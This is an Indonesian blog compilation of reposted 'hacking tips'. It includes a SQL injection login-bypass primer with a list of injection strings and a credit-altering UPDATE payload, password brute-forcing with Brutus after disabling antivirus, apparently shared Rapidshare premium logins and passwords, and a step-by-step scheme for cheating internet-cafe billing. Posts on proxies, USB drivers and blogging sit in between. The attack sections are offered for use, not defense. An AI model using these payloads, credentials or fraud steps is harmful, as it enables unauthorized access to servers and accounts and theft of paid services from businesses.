SQL Injection

Keuntungan yg diambil dari trik ini adalah seperti login akses terhadap server yg bukan haknya atau yg lainnya, tergantung kepada penyerangnya.
Default setting dari SQL adalah :

adminID = sa
password ='' (kosong atau blank)

misalnya : http://www.target.com/login.asp?adminID=sa%20password=''%20 artinya menggantikan "jarak spasi" Ini merupakan kondisi yg berbahaya jika pengubahan setting tidak segera dilakukan.

Verifikasi yg dilakukan oleh SQL disaat pemakai memasukkan username dan password adalah seperti yg terlihat pada teks sebagai berikut :

SQLQuery="SELECT Username FROM Users WHERE Username="'&strUsername&"'strpassword&"'

Contoh : menggunakan injection string 'OR''= pada username maupun password baik dilakukan dgn metode URL input query string maupun Box input query string maka SQL query akan membacanya sebagai berikut :

SELECT Username FROM Users WHERE Username=''OR''='' AND Password=''OR''=''

Maka yg terjadi adalah SQL query akan menyatakan blank username dan blank password sebagai user yg sah (valid). SQL Injection yg berhasil dilakukan akan ditandai dgn munculnya error page dgn error yg dimunculkan dapat berupa ODBC error, internal server error, syntax error dan lain sebagainya.

Ada banyak variasi dari injection string yg dapat digunakan untuk melakukan SQL Injection :
'or 1=1--
'or 0=0 --
'or 'x'='x
'or a=a-
"or 0=0 --
"or 0=0 #
"or "x"="x
")or("a"="a
admin'--
hi" or 1=1 --
hi' or'a'='a
hi")or("a"="a
or 0=0 #
'or a=a--
'or 0=0 #
'having 1=1--
"or 1=1--
"or "a"="a
')or('a'='a
')or('x'='x
hi" or "a"="a
hi' or 1=1 --
hi')or('a'='a
or 0=0 --
or 1=1--

Serangan dgn menggunakan SQL Injection dapat lebih bervariasi lagi dan itu tergantung kepada situasi dan tujuan dari serangan yg dilakukan oleh penyerang. Contoh :

'UPDATE YEPCell_memberDB set Credits=100 wher UserID='yamakasi'

SQl Injection yg dilakukan seseorg dapat dideteksi dgn menggunakan IDS (Intrusion Detection System). IDS bukan lagi tool yg terlalu asing terdengar ditelinga anda. Anda dapat mencarinya di www.google.com

from : http://jambihackerlink.tk/
Judul asli : Konsep dasar SQL Injection

Mengalihkan IP address saat browsing

Setiap kali kita brows pada suatu web tertentu maka IP addres kompi kita akan selalu tercatat oleh server atau admin tertentu, misalnya 202.65.3118.67. nomor-nomor ini menunjukan posisi, lokasi bahkan indentitas server kita saat brows.
Artinya kita sedang atau dapat dipantau oleh server web yang kita kunjungi...berikut adalah salah satu web yang dapat kita gunakan agar IP kita dapat dilencengkan adalah dengan http://www.anonymouse.org,Cara penggunaannya adalah:
  1. kunjungi http://www.anonymouse.org
  2. sekarang tinggal menambahkan alamat website yang akan dikunjungi misalnya http://anonymouse.org/cgi-bin/anon-www.cgi/[url target]
  3. contoh ketika anda mengunjungi nyon-nyos.blogspot.com dengan web proxyhttp://anonymouse.org/cgi-bin/anon-www.cgi/www.nyon-nyos.blogspot.com
Lihat IP anda sekarang maka akan berubah dengan IP lain..namun kelemahan cara ini adalah untuk load akan memakan waktu yang lama


Dikutip dari: o-om.blogspot.com

Menebak Password Dengan Brotus


Brotus adalah sebuah tools yang digunakan untuk menebak suatu password pada form password tertentu, misalnya pada halaman admin untuk sebuah database server, atau untuk kegunaan lainnya, cara kerjanya adalah mencari password atau nama user dengan membandingankan pilihan kata yang kita masukan, brotus akan berusaha mencari kemiripan pada database-nya
Scan dengan tools ini adalah cara lama dan sudah dianggap kuno oleh jagoan-jagoan hack, tapi tidak ada salahnya kita pelajari dan mengentahui cara lama ini untuk sekedar menambah pengetahuan kita. Brotus sendiri dibuat pertama kali Oktober 1998 dan diluncurkan versi January 2000 yang lalu,sebagai info untuk tahun 2004 uda di donLot 70ribu user


1.DonLot brotus di www.hoobie.net
2.Kita matikan dulu anti virus atau firewall soalnya brotus uda di pack jadi di anggap virus atau softwere berbahaya
3.Jalankan brotus-nya
4.Untuk membantu brotus agar lebih cepat scan ada baiknya tentukan pass mode-nya dan pass file-nya
5.Start, jika berhasil password dan nama user akan tampil dibawah
catatan:pastikan anda sudah terkoneksi dengan LAN atau sudah tahu ip addres server dan port tujuan anda jika blm tau gunakan tips ini dan yang ini
Kamu bisa mencoba-coba sendiri tools ini dengan mengotak-atik menu-menu yang tersedia untuk mendapatkan hasil yang baik. Sekali lagi ini cara lama, bukan bermaksud untuk menampilkan cara lama dan uda kuno,bahkan udah ga bisa lagi, tetapi logika dan cara kerjanya yang bisa kita pelajari, masih banyak tools lain yang seperti ini seperti JOHN THE RIPPER (JTR), dll! 


Mendapatkan Akses Premium Account di Rapidshare

Rapidshare[dot]de, situs penyedia layanan upload dan free download file, alternatif bagi para netter yang ingin tukar-menukar file. Cukup gunakan fasilitas upload berbasis web yang telah disediakan, catat alamat url file anda dan anda bisa mendownloadnya dari manapun lain waktu atau bagikan alamat url tersebut ke teman-teman anda jika anda ingin mereka juga "menikmati" file yang telah anda upload.
Ada 2 account yang ditawarkan oleh Rapidshare, yaitu Premium account dan Free Account. Masalahnya adalah pada Free account. User akan terganggu dengan adanya counter time. Counter time ini biasanya bisa mencapai lebih dari 1 menit. Jadi, rapidshare akan membuat anda menunggu selama kurang lebih satu menit sebelum menunjukkan url file yang nada minta. Huh.. cukup menyita waktu bukan?
Masalah kedua adalah Rapidshare akan mencatat alamat IP anda dan memberikan batasan untuk melakukan download.
Masalah ketiga, manusia selalu saja merasa kurang puas. Ketika dia sudah mendapatkan akses yang setara dengan premium account, dia akan berfikir, "gimana yach biar gue benr-bener dapet premium account". Okay, di artikel ini juga saya akan mewujudkan impian itu.
Sekarang, mari kita bahas ketiga masalah itu satu persatu.


:::::: Alat perang Kita ::::::
>> Seperangkat komputer dan koneksi internet ^_^
>> keberanian dan semangat yang tinggi Smile
>> Browser Mozilla Firefox

I. Melewati Conter Time
-------------------------
1. Copy-paste alamat (URL) file yang hendak anda download di address bar Mozilla.
2. Setelah halaman Rapidshare muncul, klik Free account.
3. Akan muncul counter down, abaikan saja, hapus string url di address bar anda hingga bersih, kemudian ketik kode java script berikut: javascript:alert(c=0)
4. Tekan ENTER, akan muncul sebuah message box di hadapan anda, tenang, jangan panik, tetap fokus dan bersabar ^_^ tekan saja [OK] dengan penuh percaya diri, counter down akan segera lenyap dari hadapan anda dan rapidshare akan menampilkan link download file yang ingin anda download.

II. Mengatasi Limit Download
------------------------------
Caranya simple, gunakan saja kumpulan proxy yang sudah diposting di www.spyrozone.tk halaman Artikel&Trik kategori komputer. Pilih sendiri dari ratusan proxy itu Smile

III. Benar-Benar Mendapatkan akses Premium Account
--------------------------------------------------
Jika kedua cara yang telah saya bahas hanya akan memberikan anda akses "setara" dengan premium account, kini anda akan benar-benar mendapatkan premium account! Gunakan saja User name dan password berikut:

LOGIN: 31989
PASSWORD: 2310214

LOGIN: 27766
PASSWORD: 8797341

User: 18549
Password: 4646182

Login: 20145
Password: 7072148

Login: 19159
Password: 7932964

Login: 20151
Password: 773290

Login: 20366
Password: 7177185

Login: 20374
Password: 5630758

Login: 20452
Password: 3249043

LOGIN: 20949
PASSWORD: 2716739

User: 22484
Password: 358030

User: 18549
Password: 4646182

User: 18800
Password: 9496722

LOGIN: 20949
PASSWORD: 2716739

Login: 20145
Password: 7072148

Login: 19159
Password: 7932964

Login: 20151
Password: 773290

Login: 20366
Password: 7177185

Login: 20374
Password: 5630758

Login: 20452
Password: 3249043


PENTING :
Gunakan trik dan account yang telah saya berikan untuk mendownload file-file yang bermanfaat. Sudah bukan jamannya lagi keterbatasan membatasi kita untuk belajar. Keep Learning and happy hacking..

Nyos Notes:
Tulisan ini diambil dari http://jogjahacking.cjb.net/
URL asli dari tulisan ini ada di posted: [14/02/2007, 04:43:08]
kategori : [tips and trik]
author : [WoNX]

Flashdisk dan perangakat baru jika Butuh Driver

Biasanya, pada windows XP, flashdisk kita akan langsung terdeteksi tampa harus minta driver karena Windows XP menggunakan sistem Plug n Play-nya (PnP) yaitu agar perangangkat baru yang ditemukan langsung terdeteksi tampa harus menginstal dulu
Nah bagaimana jika computer kita ganti perangkat baru atau flashdiks kita malah tidak dideteksi oleh windows dan meminta driver, padahal windowsnya sudah XP. Cara mengatasinya adalah:

1.Klik start, pilih Run
2.Ketik Services.msc dan enter
3.Perhatikan jendela sebelah kanan cari Universal Plug n Play Devices Host .
4.Klik kanan di servce tersebut dan pilih Properties



Pada kolom Startup Type pilih Automatic , kemudian klik tombol Start pada Service Status .
.6Pilih Apply dan Ok .
.7Restart computer anda
Dan kalau tetap tidak terdeteksi, mungkin sebaiknya anda pake driver juga atau ganti flashdisk. Atau perangkatnya hehe..

Mencurangi Billing Warnet

Artikel ini dibuat oleh seorang bernama Blizbs_Uchiha Cara ini saya dapetin cara ini konon berlaku untuk segala versi billing explorer dan kebanyakan aplikasi billing lainnya. Dan merupakan kelemahan semua billing warnet yang berbasis windows!!!

Saat mulai menyalakan komputer di warnet yang pertama muncul saat windows dimulai adalah login screen client billing yang menutupi seluruh area windows. Fungsi Alt+Tab dan Ctrl+Alt+Del biasanya ikut-ikutan di-disable untuk memaksa kita login melalui program billing itu.
Sebenarnya saat kita menghadapi login screen itu komputer sudah siap dijalankan. Hanya terhalang oleh screen login yang menyebalkan itu.
Yang perlu kita lakukan hanyalah menyembunyikan jendela login itu tanpa perlu login. Ada banyak soft buat nyembunyiin window, salah satunya ZHider. Saya hanya akan menjelaskan penggunaan ZHider. Bagi yang menggunakan progie laen silakan baca manualnya, tapi yang perlu diperhatikan adalah progie yang anda gunakan harus bisa show/hide window pake hotkey coz windows
Yang harus disiapkan:
1. Program ZHider. Cari pake google. Ukurannya kecil
2. Muka bego dan polos
3. Mental yang kuat dan berani digebukin bila ketahuan
Langkah-langkahnya:

01. Masuk warnet dan pasang muka bego biar ga dicurigai operator
02. Pastikan selain box/bilik yang kita tempati masih ada box lain yang kosong. Biar ga dicurigai juga sih.
03. Usahakan cari tempat yang jauh dari op, supaya ga ketahuan box kamu kosong apa nggak.
04. Saat masuk login screen, login aja seperti biasa.
05. Jalankan ZHider yang sudah disiapkan di disket/flashdisk. Kalo belom ada, cari aja pake google.
07. Setelah ZHider dijalankan langsung aja logout.
08. Naah, di login screen ini kita mulai aksi mendebarkan kita. Tekan Ctrl+Alt+Z.. Jreeeng, login screen telah menghilang !!!
09. Browsinglah sepuasnya, tapi tetap pastikan ada box lain yang kosong. Kan aneh kalau ada yang masuk warnet, dia lihat udah penuh. Padahal di billing server kelihatan masih ada yang belum login.
10. Kalo sudah puass tekan Ctrl+Alt+x untuk memunculkan kembali login screen yang menghilang entah kemana:)
11. Login seperti biasa dan browsing beberapa menit sampai penunjuk tarif sampai ke angka yang kita kehendaki. Ini supaya ga dicurigai.
12. Logout. SIapkan muka bego, lalu bayar tarif.

Cara ini lebih mudah dilalukan bila si operator ga terlalu kenal sama kamu. Apalagi bila si op sering keluyuran.

Ini beberapa hotkey ZHider yang bisa digunakan, untuk hotkey lainnya silakan baca file readme yang disertakan bersama zhider
CTRL+ALT+Z Menyembunyikan jendela aktif
CTRL+ALT+X Menampilkan kembali semua jendela yang disembunyikan
CTRL+ALT+L Menampilkan dialog zhider
CTRL+ALT+M Menampilkan kembali semua jendela yang disembunyikan, dan juga menutup zhider.

Kalo cara di atas ga bisa dilakuin, hentikanlah usahamu. Kalo ketahuan langsung pertebal "muka bego"-mu. Misalnya bilang "Eh, kok jadi gini ya? Kemaren ga gini kok." Ato kata-kata lain, tergantung kreatifitas hehe.. klo digebukin lari…sekencang-kencengnya

Kitipan dari : BLiZBS Uchiha

HAPPY BLOGGING

Dulu gue bingung bgt apa itu blog?,gmn sih buat blog?,dimana juga buatnya?. Gue pikir blog cm ajang chat room, forum diskusi atau sejenis ajang gaul buat anak muda saja. Padahal sebenarnya lebih luas blog adalah suatu web page atau home page yang dikembangkan melalui fasilitas database tertentu. Sehingga pengelolanya dapat mengukur sajian halaman blog secara mudah, cepat, tampa konfigurasi atau perubahan page secara keseluruhan
aDA definisi yang mengatakan blog adalah suatu catatan harian atau merupakan seruan untuk memprotes sesuatu dan di publikasikan dengan media web blog ini. Menurut Asdani Kindarto blog dapat juga dipahami sebagai sebuah tipe atau bentuk website yang biasanaya disusun secara kronologis, dengan susunan entry atau posting yang teratur dan terkadang ditulis dan di update secara teratur
Type your summary here
Semua orang bahkan dapat membuat blog karena tidak membutuhkan keahlian khusus dan pengetahuan mengenai pemrograman web dan HTML, beberapa penyedia blog gratis telah menawarkan beragam kemudahan bagi pengguanya, so silahakan buat blog n posting artikel anda, selamat ber-blog ria aja.
Penyedia blog gratis :
· www.blogger.com
· www.xanga.com
· www.blogsome.com
· www.multiply.com
· www.blogdrive.com
· www.blogcity.com
· de el el deh…soele banyak
Type rest of the post here

ANATOMI HACKING

Pernah dengar istilah ini? Yap, bagi seseorang yang tertarik dengan security atau kamanan internet dan server, mau tidak mau kita juga harus mengetahui ANATOMI HACKING. Yaitu apa sih yang dilakukan oleh para cracker sehingga bisa masuk dan mencuri file user password di server yang menjadi target.

Dulu saya pernah belajar mengenai bahasan ini dan sungguh mencangangkan dengan mempelajari kebiasaan admin dan data-data lainnya tentang server pada suatu situs saya barhasil menyusup dalam table admin-nya (pengolahan data) hanya dengan menebak passwordnya tanpa harus scaning password atau dengan tools-tools hacking
· Footprinting
Untuk dapat mendekati seseorang atau lagi PDKT biasanya kita mencari tahu informasi mengenai si dia, yaitu:
1. Apa hoby-nya
2. Makanan kesukaannya
3. Nama lengkapnya
4. Keluarganya siapa saja
5. dll…
Hal ini sama halnya dengan sebuah server, jika kita ingin memasuki server kita harus mengumpulkan segala informasi tentang server tersebut, seperti :
1. Sistem Operasis yang dipakai
2. IP Address server
3. Port apa aja yang sedang terbuka
4. Aplikasi yang digunakan server
5. Dst..
Hal inilah yang dinamakan footprinting yaitu mencari segala tentang server atau target dan proses ini terbagi atas Inner footprinting dan Outer footprinting,

Bersambung…….